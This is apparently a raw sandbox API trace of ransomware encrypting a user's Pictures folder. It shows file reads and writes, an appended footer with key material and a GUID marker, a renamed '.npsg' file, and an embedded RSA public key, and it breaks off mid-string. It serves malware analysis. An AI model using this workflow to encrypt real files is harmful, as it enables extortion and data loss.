pdwDataLen=0x39afa54) returned 1 [0238.385] GetLastError () returned 0x0 [0238.385] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.386] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.386] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.386] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.386] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10450) returned 0x3b95d50 [0238.386] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409d40 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009c8 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b85ce8 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009e0 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a10 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a70 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a28 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.387] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a10 | out: hHeap=0x620000) returned 1 [0238.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a28 | out: hHeap=0x620000) returned 1 [0238.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a70 | out: hHeap=0x620000) returned 1 [0238.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a70 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a28 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400a10 [0238.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a28 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a10 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a70 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.388] GetCurrentThreadId () returned 0x5b4 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b83ab8 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.389] GetCurrentThreadId () returned 0x5b4 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a70 [0238.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a10 [0238.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a28 [0238.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009f8 [0238.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a88 [0238.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a58 [0238.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a40 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400aa0 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a40 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a40 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a58 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a10 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a10 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a70 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400aa0 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0238.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a10 | out: hHeap=0x620000) returned 1 [0238.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a40 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a88 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a28 | out: hHeap=0x620000) returned 1 [0238.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009f8 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009e0 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b85ce8 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.393] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x10444, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x10444, lpOverlapped=0x0) returned 1 [0238.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0238.394] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10449, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.394] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b86cd0 [0238.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.394] WriteFile (in: hFile=0x644, lpBuffer=0x3b86cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b86cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86cd0 | out: hHeap=0x620000) returned 1 [0238.394] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.394] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.395] CloseHandle (hObject=0x644) returned 1 [0238.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b86cd0 [0238.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.397] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\JaGqQ-wLvKlJ36x.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\jagqq-wlvklj36x.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\JaGqQ-wLvKlJ36x.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\jagqq-wlvklj36x.jpg.npsg")) returned 1 [0238.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b86cd0 | out: hHeap=0x620000) returned 1 [0238.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.399] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0238.400] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4ce5730, ftCreationTime.dwHighDateTime=0x1d5b761, ftLastAccessTime.dwLowDateTime=0x19321170, ftLastAccessTime.dwHighDateTime=0x1d5b786, ftLastWriteTime.dwLowDateTime=0x19321170, ftLastWriteTime.dwHighDateTime=0x1d5b786, nFileSizeHigh=0x0, nFileSizeLow=0xddda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L2BuYy0GjuwfspGY.gif", cAlternateFileName="L2BUYY~1.GIF")) returned 1 [0238.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.401] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\L2BuYy0GjuwfspGY.gif") returned=".gif" [0238.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\L2BuYy0GjuwfspGY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\l2buyy0gjuwfspgy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.401] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=56794) returned 1 [0238.401] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.404] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xddb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.404] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.406] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.406] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xddda, lpOverlapped=0x0) returned 1 [0238.408] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.408] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.408] lstrlenA (lpString="-----BEGIN PUBLIC 